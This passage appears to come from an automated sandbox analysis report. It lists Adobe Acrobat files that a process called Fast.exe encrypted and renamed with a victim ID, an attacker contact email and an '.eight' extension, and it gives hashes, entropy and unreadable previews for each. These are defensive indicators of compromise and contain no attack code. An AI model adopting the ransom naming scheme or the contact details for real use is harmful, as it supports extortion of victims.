    SSDEEP:3072:MYN65p7zNXYLLtP5zppwNDYfqcmR3tU69NxENln4RNkwjawHeWZsS27qoX/Idp6Q:dN65H/MKxt59NmN+S+ae6SoPIdpT
    MD5:9E883B0CE7F475B3C13FB29A80FA28F9
    SHA1:0F2CC890418206C228C14C199B6D6172C09B9005
    SHA-256:8F2FE97993E25E0EA8E53E31848FFFFFCF86D9FE6CDB4988DA5DFDC33AB9B203
    SHA-512:DB587C44C1566F319C93F400BF970C647CDFD6E2236288E0899F94B631DF497DDD71BC28ADD3590D00521B90B61ACB7C9A83C5EFE6503D2EB2A45E755FEEC269
    Malicious:true
    Preview:6..=.7..x>\...\.....W.M...A.......R..;r.....JC..I?.._,.[.7...U.............b.U...R.B....9....^..]..^.Af.}...U./..{.Q.c......Dx_U.k....%.Ge..l.g..P...-.z.E.^.Wf.....K.@L..+...7.K.T$...0/..w..GW...p*zo.V ..Q2..F".kV...........3!...~....1..a.<.l.5../.*G.i.....8.r.=Vq...........X."E.......N_......v.7S....+B..!(.....&./....>........G"[.G5$j..............k.@.W&....J. .=."D..%<.j...."FQ......Pq.....W.4?.a..Z.1....&.].{?p..r......a..l ..X...fs....5...0:-...*.O$.m.....@m.!4a.&.qrl....9.....;...#/...#..*..?_..\.8z...Q6p....>..(.f}9.E............S:.b......!.m..ET.mp.X.[4....Cs......R..$...S.L.]t..,AJ........|.-....l.S ..ul..\.i.......5.j`x..4..&.8K.d...........h..DkH..*.a0...wW..*...`n.0..+.#...-.....y.`..>....#Q'./nv/x@...Jg....i8n.f)yl;-...9 .,o".c.@.,....{1/.]..l..D..5....O.!..F.m.?....K..R{......,.:a.w.k.D.`B.....8....C...f#../&\......gF.\;....}S...3v.p.n.Z@i.`.%ooJT......}.A...H.L..T;../....U....z$YS.....dY7......4..........>...60G<o..\

    C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):213202
    Entropy (8bit):7.999012671568519
    Encrypted:true
    SSDEEP:6144:kioohBMOcEp69JsLagl1jaKLqN9qzza7/G4Rz16:XFBT6vsLa41jRwmz+/GCzk
    MD5:8C9352810A3550BA3496077F97B4F213
    SHA1:10140A08482600FB29C1911C9691543D17EC3B96
    SHA-256:3C3C89FE8664F434A0460FF4343845B40C5B7309336DB39F39370C787207D7C6
    SHA-512:5A281B3234A327A08F79D2995587D8E69C814E2747F3DCFAF0FA8DA8201A22A8CC68260F9E15C0FB99269C9FFAF4575884F93C3190C6778084DF2A99CFA2E17B
    Malicious:true
    Preview:.6..6.........x:b...V....4^....;vE.......Z.........hT.)2lt.:..x..3....@.'.a..^...)@.9.......d6.7I...j......@.t.c....'..&cz..r..?.d0...t.1...Df...t..\.f...:...o.[_....c...\v.....UL._.7N..mj...9p@1.s..!cvt.0r?..........[...zR.T.p....<.).<.^0W......4.....J..gy...(..f.^............k.N..ao..yV. .bCKS6.KA...D..\H.}<ab+.@.l..&....`}.u1.q....{.H'.Ns....@.z...'.'}4h.q...........1I......C...|+g..6.T.j..KC...0;..|:.u...Q$.D.J.e.I.t0...@|.%...r]S..A..G.....K).c....f...}_.....D.....`.,&p5.....qN./=.N+./I.p...w......R.V...g....M.Z.2....9....$....{d.m(.D...m....)T.( d8@H..o...B.d.@t*..W..Z"..B)&%B..U=.F...,..|..........T.g'.)*R..Q.+..%....c.@l.....4.ka..x.a].s..J....Ni.3..y....4.....X}.....I......9y......<4..s.`.H...4!.!?..f....5..V.Um...'t.Ex../...S"fE..9..bHd.*..n.<hl..iP9-ZW.@j..0s.Q..3..........B.E.w..]~.m...A..+.e++}..>dIX..]..h.Q._3]....p.....o.k...f.vO....1L./...9...%=u.3.N.!.{..P.."@.......#.}$g..t....jq.....j-..t.gO d....X.J.%.%yx@XH...k.3.q9J

    C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1227458
    Entropy (8bit):7.999869724844986
    Encrypted:true
    SSDEEP:24576:Pxsubl+z/xsSp4ggpdWaGPt0ZBRkcgcstrz7Cjpl5qE:PxsuI/xX4gedGP2fFsd7oPj
    MD5:9DF3106D9813102DEB79D8D4C6AF8AA7
    SHA1:721EF59C4BA595435591A5A68025005710121441
    SHA-256:6CCCFCD3525E64CFB6524DB51338E56784CCA5CE8927CE9EE402AEECABC10594
    SHA-512:6DCDA1FD3B7DDD8E3FA703E49CC6F6B8592214A4CA481533C1FEE36A57C5FE67A22FDAFBC03768D736D9255333C64ED6199C909794088CC6B96FB6B0D1202F40
    Malicious:true
    Preview: ....'9Rv.......6N.c....+.%...9.z.!.d.L.....&.....B.L../'.$p:RBg08.'.z..\..p/A.s......y.q.SP..QeH..s+.v]{.2.g$cK O..>..._..^|Dunc.-..mL......._M.`...7......O.q 9...a"k...].1.9#l..}....6B...~&....Yg9.C....Z......>..)....P%;:.@..b-..o.-.....F.G...8..T....t+...%S....jS..~...R.>`..R......q.C....5....~....9..\.t+.e:l..d.,.b...)..m..1t.{9L.K.0......I.....P.[...g.>..%3o6..|...)Z..E.L.% ....}yV...]..4-..!.......F..`[.r.2....-w}..&.c.R.l\.......24.....1U..p.+.+*..M.k.2...h..S..:..i..P[.g..G+5FsR..........}%we.=?...T.G...N.....f.qA..I]..\...geC.-Q..\4<b...{.l%..U.C..M}........V7..Q..vU$).!.>...NU4_.9. ..g..q.0s..\.W.....Cu".jx.T..\...t'+bJ...(....t.....r...hh.&..,..eg..~B...........C"Z.s...8....0.z.X...R(.kt....>..mes....3j,...P'......~.....#bg.....q....'e..XZ.N..s...j...K..........=.x...]'.C....^.....;..SD{..CoV.....[.fD1.y..+#Gqb..."..8^....30.._..r...F.5.n3|...3..;s%...k|.Nre....G..<..g...%.O..+....%..-,..F.m..!.K....W.q............s,%B.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):343762
    Entropy (8bit):7.999500888517108
    Encrypted:true
    SSDEEP:6144:43PbC/fDCVd5XumTa9NmWzlGZrS3Gdpk9mdaNJJSocbFxwE3:+jC/+T5umTANm+lGbdp7dRVbFxwQ
    MD5:697A4AD1AEC7606BB007468C63C4CCCA
    SHA1:BB1AEDCB0425BF2C7237CBB3EA7CC963CF28CA6D
    SHA-256:D02BC8B103611DCC58E6FAB76898138486AAF8BC55CC304FAB59119E9F273D88
    SHA-512:019CF07089DB3E2F8F52C32391B024F81842A636CE29A1437DA3D932903C841E2E7FF8224907AC88C2D1FB07F8866ED5CB382D1F06B0B9F236FF74B95CD4FA63
    Malicious:true
    Preview:W~.+.....0Zj....6.?pYF.....t6..)e..Z.........>Z+..m..{YGI....{..R.j.....e.a..=l..8...>F...g.2....h........9.w........q5=.{U.yLwt.....We..5..r.^..5.P.......@.....VS<.b.$.(....!..J...r.._..;Ul,I;T.....3..!.1.....'....Y..hY.:WJR..I.^=UC)3x6q...?1aP...n.j/..~.Y..g.I.....s....l..q*]....H.r.@!.......{..MA6.TF..c.r.U........&...C'.%...p..),."]Hu.<.#.:>..ev.G.-.........1#....8.+J.?.0.+.SRpOj.IC.A>...v".....3..=.A..6..|......:.f..'Uv.~xl..}".+...c2..&}..1V.:..e...t6E/..h.*WUA..,.....W>@q..si..y...i.=At.4...TfBt..8.......b."x..[Ww.'..V....9?%0.....'....+r..m/....Z...h.q.6w.3H..k^..h.q`B.%"...M.6k.n.......8.D.y(v..o?Dsx?.`.Bh{G......v.8.<2Y/X..p....eQT............D..y....?..z.w.f...P.?_...zO....p7.d.....v8.`.....s..[....%..1.CN.:.....y.=...7....C..?U...i.d..O... ...O.*......M..\#."...d......-...;...S.k..F.."..m....k|.RN.....`...n7.......s......#.}F...t...i..../2r...../..i ........[...C...z....P.. .X.q.i3..2r.R....)b..?}Q.;.Z....54.k/.H+...2..".f.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4368602
    Entropy (8bit):5.717356914764024
    Encrypted:false
    SSDEEP:49152:cC0nNc/RcYHCY9AwqdHIEogMAYrukdUmSC+bXMZQU1QqpdxtRn6FKxyJc:iEIzHIEWOyRnQ6
    MD5:F2C7EEEAC30EC51ED6B96F4CA7692E36
    SHA1:99D26E91677E8AA067F7A31704D893CBBF176192
    SHA-256:51FD1CB859C955C0531FF45674BFECFDEA289B02532BF7C2D7BBBB023B65210E
    SHA-512:89D095559E7E3805366B07A7D779772F5B22A988950F9FC0402A827328C510FA42132D658C802B61C6AA87337BBE94CC83D36D1457E57FE55207A341E97E5ABA
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):27298
    Entropy (8bit):7.992432813605974
    Encrypted:true
    SSDEEP:384:OE9pQZetx09TesvqScO2rL+B8GIxGb2bL5USQlDTM1qu+/F/3MAiof3HcUQSuiaF:7yZe709z0rL+pLbjSV+NPpNHwSMJ
    MD5:87E15AC276662C65A5B4E30CC9EFD010
    SHA1:6BA50DDE19CFF96FB1C7A5CD7BF409683CA8C571
    SHA-256:8A60CFF9131203871AB639159D6247D039E36EA871CF0A5C3D3E28DCCA828DD7
    SHA-512:F7FBF8ADADFF5678B90F9DCE52F5D9B5EF5BEC7B07D9AA93E226208B66A2EF45A4891ACF417936C24D727EACBBCC839071B19D85039D7643014B71EBB6ACEBCA
    Malicious:true
    Preview:.(..uU-.I.......X.Z.#..5.&...._.............j..Teg.s..f.i......@...&../.. .E....Q*.o.y.W.|4.c.C..T.V..J.......~.<....n.{.A.......9C"V......6T..h..V...O54@..B.......$.`{....s..,U.Z.....p.....VC......A%s)H.....R...v.2}..Ys....H....B..0........cF.*..`...&0.O.M.nVZ.q..*.+[."F.....L.=l..M..5..@ E..d...6yA....i.y.{...-9.oJ?i.E...B;(+.....b=.!W...........+1+..2........g...-&..T....gn.Sq.M`...y.......`.(....t._.'..my.z...a.C)..*!.sS...V.^..;Z.4...&`...?.*8...s...q..^'..;..d..B...b.',.a.l...d.e.XpUZ...A.W..[.}.}.......v[}...[}..T...A..%g.....Ba.nKb..!A['..\C)......(..~ ..o.....e*..@.t8...[...u...v>.A.KW..r.a.... ..T.=....tO..-.......X~../G........c\...#..#Xb...;.m.....W8wb..d..h....-S.....F.7...5RG~..O....gLR....(2..F....M4=.......#6^.;..W..L.G.".B..'..f../....6...&..r.m.... B.........x..'^..h+.. ...N.]LV.n7...5.ZD#%..x.8{V...._.QA5pG.^....q:l......*n...u.....G9.%+..7.Qg....Q.k$.%6...znJ....`.....s.-].x....{.W.FV1.U....n..B.e)[.....6.......1.w1.e.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1938
    Entropy (8bit):7.8778717826069595
    Encrypted:false
    SSDEEP:48:0E8i/VBV8XD3lfJrjwliloolOP/jUSJ6RoMT6LQ:XJVBWrTljCFJ6RoMT6LQ
    MD5:046F01031AC7282A1B5EDBA254FA748F
    SHA1:F51EC04A38442C97D72634CA715200695C96DDFF
    SHA-256:789EF998C799DA14F1B8C83CB80800045D61568B7DEFA5B5142BF8B2AA328577
    SHA-512:BC5C03236AEA5AEEAC9A04A1E2A9EF772FBF8F0E9C67F4A66452671FFADA8ED1787DF6F66201C3885CB964A6B888AAF148C60799F44D6DEF50DE3D081566F11D
    Malicious:false
    Preview:k....~...A-~Xo......QO....u.;.........P[.CRg/.6.).....J.6..-.......5.[..{K...K..~....Pm.g?,.P..KH..n.........=.............i.x.&L.k.LM.`$>.....`".{i?.`......h...<...Ss..=E.q.B..L.[al..._..J....E./...G......=a..o.L..l.ef....$.g..[).YX..)......!.eJ....3.?.c.=8u..e .D./..}~4..v).J..C.....3.Bd=e..^..7*.-B2...(.N2|......;...6.i ..Y..t.z.5.F(Uw..J.}....Q=8.|+..<.h.=.L.*.'.6.:.Y....r...7,.......+M[.VO..~....2.9.......t. .A.i.Z...b...zs..&*f.G..6<..0..,.8..-=-.ci..C...~*...;....y<. .o..W.a].L..g....|.S.S.-..:N.'+....h..j.*t.U.B.......WB...{..2.'..L>=...p./[,b.(.)<..N.C..q.H..s.rz....p\4t=H.J....7...a...1&-Xs......|GcK......X*...DS.4.}.......hM.<...l.j8.O...O.X..xRSY.V....=..Lh.^!.....&..7....8.D@s4.V.PD@........1.#......*..<..E...C...29..l..|k_o..j.L..[.wJ....>.D.4?.hx..$..j......4yi...i..^....."9.Wu.`..x....~..\_v..#.<.ZI...."...M15.E....TVA.....;7.".&P...c....b;y.B.eYb.....qS7.#.M..&...:......N>.......Q[...Y..xm.....d.(......2.......6=..q*Vs..pq.I.\..

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):60160266
    Entropy (8bit):7.980078261554565
    Encrypted:false
    SSDEEP:1572864:/Qb5m2CYw2bheyHA2DiAaNqCPiQwm9tqGWS15Vj9QVqd2+NAs65:IXhwMhe6AAaPiQwF6xQ22RJ
    MD5:AA62926C7FAA49E853B82305C006C557
    SHA1:6FA9580728A6875B50D83928091C1441EA3D4B36
    SHA-256:5B7297BA0FC2B2356D71DDBE28214EE69C265012A6E053B7E91F417D23864550
    SHA-512:4A8D79906293FF3067AD96B87799642935FE75F55C298D8FB7DFE70366BFCFDFD3884A08BB3C98900D1817A99762EFD61E79201EFB26CFEA6E547EAF8E0EDDC1
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):614866
    Entropy (8bit):7.999659143159799
    Encrypted:true
    SSDEEP:12288:o/EE22OG/ZGVl6V5ctDtRIGygwAPSpzrXQW4+0X2QsN2TbekpVC+:oD2aZwC+M5mSpPgW4XX2pN2h
    MD5:1A4D8859BBAE294D0693381752F05940
    SHA1:504908523B77511AE6C7CA1A1AB2E17320B882C1
    SHA-256:E2FB76A03C2350ACCF4B0F26F5D3C6391EAE9E9D86AA1F1C897D1663FDF53A3B
    SHA-512:4EF8389E4A8B8785354CDD3D1C42C5E8AC28D3B2672AFB94545735CE38C68E35BCE948C62051693B3D251DA47F3149585AB10F18B66B130556C7C8DDD3547944
    Malicious:true
    Preview:.U.j....e...!.T;...d..1H.;.=.Ar.:x5a.T..A.W..J[w..}...g..4.........|Jwk.Pg........}.&...qYoC.#NeG$%..N\.....8.e.(....w..G.h~.....{..0..4.w.T,......~...]l...4./.t|...8.X$.<G...I.[...+..f..........bv_.x.`.i....7.~.S........%"k.......I......5LOQ.........S`H..,...d..$...D.J........K......#.9..>Z.X.......S/.7a......L....30.....tC..v.......\.wf-..d...,..C...........LY-.@w.E..Bw.."6....."....A.~.E....X...#...7..J?.K...(P.,`....T.M.8....%N7.GJ$.......J...S.}8..r\.|^..Te1..}.}l...pD...}p.,A.....y.+.lC..B...m. W............ .'%..%.9..n.....9Qz.'......Ke...r.hF6.q;.Q.ZS..^-.MM.z.y.<f[].3.OW8.t.....6...<<.3...V..(.......iV.>.$n.g1..9..u.i...p..7$8...;..Wh.]....5z.^.r.g..K.=....eJ.R..8..X'Y>|.e].....v...JO$..:.....g......R:4.TF.".?.h.....!.{...i3b&%.U.,.]/...5nAew....].....()...J3V.|....r...1.......).....t...$....r......_...5+.*...o&.+........v.X..........km'..b.k......%....,..1[.R.hF.g3Y.mH....)P..Ck...[x.A......\..F...e..6.q/..F..b.../.\.Q...%.Y..S....8.K.9

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):918770
    Entropy (8bit):7.999826596458451
    Encrypted:true
    SSDEEP:24576:iAn0lz92lkWR30Ev9OJPKNxxrGjbjzYIlLU/weYmw:Bn0ir5vYJPKNx6bjXwIeC
    MD5:43388E83E206C16DD4DCDC063DA19E95
    SHA1:99D06C366727A4B47CC49D1A540633C95D23633B
    SHA-256:F89881790583364752FB4A7A9AC3A6FB75027ACEC9635403EF3970FB952A5F87
    SHA-512:BEBCA69ED4AFACDD8BD92765EC934421487651ACC9B1DF8354D353292B876AC3DB84F82CB5B05951CB6420540ECC593C68EA5E2D69E64DBB0CD0039FFC6B87F3
    Malicious:true
    Preview:)n:.....-.....6P.{:...,..1...[.X.Y'...r.-...z|?yu.:8|.]...3....lZP3....`.q/.^=..I].O.&........Eu.x\.{.6.@..62..K......%.M...b.4..5......5...w......A68..Q.]D..p......C...I.\.A.W......m.....E...A*|j.pS.$..:4.7...&*.....X.......;.h......~|.-..2.'I.......x..9.....#/..P....uZ..1.Y......c.t.J.ea..c2.Pw...49YTd..S.N....N.A(.N...6v.d..@.gF.\2}......=0.Y......8..c.U../`...)TP-....w.H..b.g.....1.s.S.H.....ij...e>:...8..BUE:.\...}e.gj...$.b.ja2!;V.m...$....(.....{..../.....-.n....r.M.Oq......O.?...T`.!.U....n16...i.)......R...5......6.!.M..>U.,v....P...c.E...v7...J.".6..0.R/.iZ.$.qefR......O....a.aR....~..fU.>....E..S8i...2...'.'..........-&XdGP..0)$#.j...R..W......[.3.J.3.'..[{.l.L0T.S/R%.|..g4*...D.MM.n...V..^......O.....c..u.\9=~7m.q0..oZ..]..F..+J3"...5..yV......94N.#...o^......>.....VU.X$....9k\|.W..i..`(Z&.E....Wi..k.2L.B.x;.......8.!...;D.z5.x............TQ}...,.o#....W<.%a>...W.......K.D....(..x....1...U..qDmTn.-...1.....s...1xJ...P

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1224402
    Entropy (8bit):7.999846824472683
    Encrypted:true
    SSDEEP:24576:ZWISuLrInfj5/8aSqe9q1aBUHkry4DTxb6JGRiOTE7vYYf/a:EISuLrIft0aSX9q1aGErTDT8JGRiOEa
    MD5:24C9669A2DE083596D440FA47D408984
    SHA1:95C9A788A25E87810738704AAF7C920F5245D46F
    SHA-256:89F9F88BB30D52A976EF28D28D208025E8506473C0F3118959F5C69C54D5E39D
    SHA-512:3B6FE4DB634DDA79A59E8F2A374BC088B5110298F5B6EAB4DA9E0C70C7877512A6C66590598DC88A4DB5A24295BAFE60264253D74CF0D107BE6523AF7A8DC9DB
    Malicious:true
    Preview:..............l....-&...X..?3.....x~3........4.^.....u...u.."..m....QD..........@O...~...A...}z.A..K.kt..sD.o.e.n<y.'....o.X..]..k.[..Yy......@n....k(.,......OP[........u...i..Mf..f.....y.H.%.......x...../..a..i....m]\2...n.Dy*.A(...{..#g.x.$jo+VJ..9..~,j..i...?.1..4@.*.......e.._G...2.H...v\.T..H.~....!..\..`....sw1.m.VV.U.ni.?.._./..e..%..>u.b...+.-.|.>>..Y..s..T.?..#..P=4o;^......Z<.BJ........I..S.b[. .n...4.....dU.\=T:s...Ve\n.O....~.`.T3...w..R.qoDv.U.'.. ...c.8%....T.{.,u.J.m.p^1^...:.o..<.0..wQ..&]8.}.....F..;..8c..<1IQ.'.m....g..)N..x1x.._.>...#6KH....\..<.B......__9lV...I....V.%,k...H.rWR...V.R.d.o.IM.<......;............7.M59..^s...]3,=..I$U..y...wHP..c1A+5.....T[..s..F.......f.....k.......%.Ml..b7..F.....a.}eN>%.i....'UgR.R......l...%./.r9.V....o.......r....AF...{...{+....pe...X.....m.]X.....%])....w.jiO,.i......[.=.S../..%}G7..B.....DaB..J.Vt....0q..A5........J.U;.@.H.l..I......a.j.*'..LNT..u..k..^..`...+..].VH....*..`Z.. ..~..Z_

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\icudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11237730
    Entropy (8bit):6.160293658078322
    Encrypted:false
    SSDEEP:196608:RzwSv9AAyNe6liXUxCGZHa93Whlw6ZRnjCGPt:aKlyNTliXUxCGZHa93Whlw6ZRnjH
    MD5:085D5FBBE92527A5E7F357CE2D91087C
    SHA1:AD31C1E2F65B53F9260FFB8F0A993C9A059D7C56
    SHA-256:397DAAA709ABAD0F6FF197760E88EDF134515FA1F7AC54353FCED45E742D6584
    SHA-512:646A6AD48DA115888C59C30BA1C2BE990A03E93A5F7A5FDFCBB78EF7CB6734EF838C413B53812595F70642F4FACB953821C5889EC0FEA29431DA3812E913B54C
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\libcef.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):177411282
    Entropy (8bit):6.6626076835274
    Encrypted:false
    SSDEEP:1572864:NqyTOaliwnJRMpKLDZli4ozxIejTz2u9Mlk/jBfg3GH5gVtTcV:t2JgVKV
    MD5:9FB34F77CE5FC007BB4A5C9F897B2A1B
    SHA1:91AB7D3E6315860D110629AE966C144A256873F4
    SHA-256:711EC6F3816A3E8672A08DB5A582CD472A389586E9B626F30B2EF70423ABA45C
    SHA-512:2B42C2671D3389B35917AA3A4CC208974658B8CACAAE3DE040DB2F712BCC89E60A25D1793D0D6D77DBC80E6235830B9CB63C23E867402555F10CEA64E87958E0
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):341202
    Entropy (8bit):7.99943396361444
    Encrypted:true
    SSDEEP:6144:PaF9nbXoc16zlMPpxQC/1PTv/I6rNbbkWIqGFRqsX/ntnYPemPSZ3ALyfMMxVeMz:PWKYQC/1zf5Hk2GzqytYPemSZQLYP
    MD5:3F83242C1EE95D373622E7EF838BA029
    SHA1:F15346B1716FC184660A01EF2785467609570D33
    SHA-256:DFF8C58EBD1ED388946FC9703531618A678C1EEDB67081FDBA9A67F49D26B287
    SHA-512:8C8F2A5FB281E183247CCFA2C8F0C575E5E43BD74A9D165AC22D73E89A2740ED06778D907085F587019D37924BBACE8F7CD9F0BB79D2C77B4D1B7D4B892E2BAF
    Malicious:true
    Preview:&.e!.p.....e!.......AJWV..!>{....w...:......O$..".|."..>@..T........\....pt<..X.^.2`.W|....0P.&T...;._[.W.IJ........J.....Ed^~Ys...... A..U.k..@g$bv.@,.P.....5c..1.P)4....R..@.`6.E.8..Q..y.Y.g.m.u...Aa....~..).~_..."....b=../9....%.=....S...]L..E..]....y..i.S.}#.|N..d.H.....&tgae.'..J...R.X..w......g.@\..l.hYi.,:....C.....o6..V.qA....s..`C.O.x../....."..'......jK.p..$.....}6.....6Q.v........G..RO.[p%..~.[.+.r..2..!...Xjb....am.......E..xv...ri....Y :4..h...:.F..j..K.....3.d!.xKG.^&.ig}.7.....cT$..auK).>.....C..d..X.1`...".&C....."K.7........E.|..*....~}1........F9..T....S.4;23.7o&k...&n*.Q.........l..f.L...D...'.V.8......}ov/w...a....%n.t.....*...Q.....25...A1.cY.....451.O.wJ.......}.%9.cX......)..7....@l.....hp7.H#~..i...*`.o..k^........,.R..N....zL.X...-r::.2.LvO.P..r}....)....m...9..H.F.+..M.C[Rs:c-.P:a:e.....n.u.b.j.P..O.q.......0.......].".............:'...._b.$G....d.G.Eb.^.g...%...s....a.$@.......`3.H}.......f ../....(

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8207566
    Entropy (8bit):7.651175822415572
    Encrypted:false
    SSDEEP:196608:Qi9AF4cC5G0p3m18orDhYVskrDIleMPXWOM:QU64v8w+BOVskrDlMPXm
    MD5:7DDDE97286A78121EF74A8E23D81DBFA
    SHA1:A46E7377B2D69496AF7A1CDBBD587A61DEC25D29
    SHA-256:B1DEDE3C2643D456D5DFB4CFE722CF7C4770969811CD0D9B6041E9F6ADB1AF75
    SHA-512:578EBB4E94B9C4C109ED33AD489CBAA4BAB914C3A57C2CF685118512969714BCE0F7634E9E46CC4AB88E8FF8A29AF497076ACB4B91F40A2CB8F03B5CD7FBC6C6
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):415394
    Entropy (8bit):7.999609955550204
    Encrypted:true
    SSDEEP:12288:gH1+v/2Zc/qWDuL4GJVqQNQyXJ5EG0IeL8gTOhR0hp:gHwv/2CNKxLL/JXHgI0b
    MD5:F4F51E4BCF3B766A009EDDEED6AD2A1A
    SHA1:B4325BEC63990F836518A5BC641D7E358B8C8F7B
    SHA-256:E7D678FF7DAF9B80F51A0D3081F7462478C91E03241773A5143C6D29E9A05896
    SHA-512:A56A06178662B8FD776E26D2BACDE49895308DD521D4BDE3E8A6B34F0A8CB504F43DCC4B6EF06FF5E67FD85497977AEFBC4227C1FD2CEF0829DDE9F604DF963F
    Malicious:true
    Preview:..fw8s.=.9...).Y.%..1......V([..Z...........-......xq.p.cQ8&6.2....t.f....Q....FJ%4.c..c...........w..w..i..A........K..tI.%.n0...rQWG.@.%.< ....O..X..(L)[2...Z..).>.Z.Mr...nh.....H..@^..q...=..`....`kT."`*r.0.p.HlI.....}S.n.2..A.U......1.... >.!.[...BL...}..sY..l....J....m&Iv0...9..a.#1c.`.....).Z?.Scx.......8...R..M./kTo.......r...G..%.T..WT.;..@...T...!..d..m...2.....}..k.@:N.....s..q.R.|,*..82/;q.%;...=x.#f&.o<...y^D^>\?...uv]M.....V.....Yi...'....z.&..3.E.g1.W}..."5.^V.p.....K.m.W.M+......v.9,0.a-..n.i...V..&X... P...uR...d....:woM.f+..A?.)...+.f*.(.B.;..4.$.rT.....jP.6Y~.A.pfQ......./...\..B..t1...1.*v.H[.L...p.q0[5...(V....C#.....r(....}..v.".rG....J.........*.....V...G..Q..p..u....1....Ey.......f...2"|.....}.`....\.X9..;.y`..$...f.D*.A.I..z'.B......gC..XOId.k.^1....m...%....@./...]{"g.'.. :....g..~.zlL..2.B.D....E..-....6p".F^.\4O......:.#......j......,.3.......[.. .g..!.j+.Vs>F.......dD..8=.lp.N... x]&..........&...3..~`...`...U}

    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.987210994193662
    Encrypted:false
    SSDEEP:384:plFYQOOyX36ZHJ+m7FDVjxFTp/xZh9H7Wf3HnnGWbchqQ:RYFX36pJJdhR6f3nGW7Q
    MD5:D0EF47C9477D40CA84DAC3A53AF0174F
    SHA1:B6B80E82FFF69C099E4D6CF59EEB8DCF48423820
    SHA-256:241B805AC6D206D80C4FEAF037382D97584B7A3FFB4F6D44E069E9136F8D0C5E
    SHA-512:91A27F52978A66268A77E3490A0D22D0DE1AEAC5367BD0468C7E7416246A9957FB905272A8BAA58902F91E2A60C07C5B6DE39547869AC4A126EC54DBE414E8F0
    Malicious:false
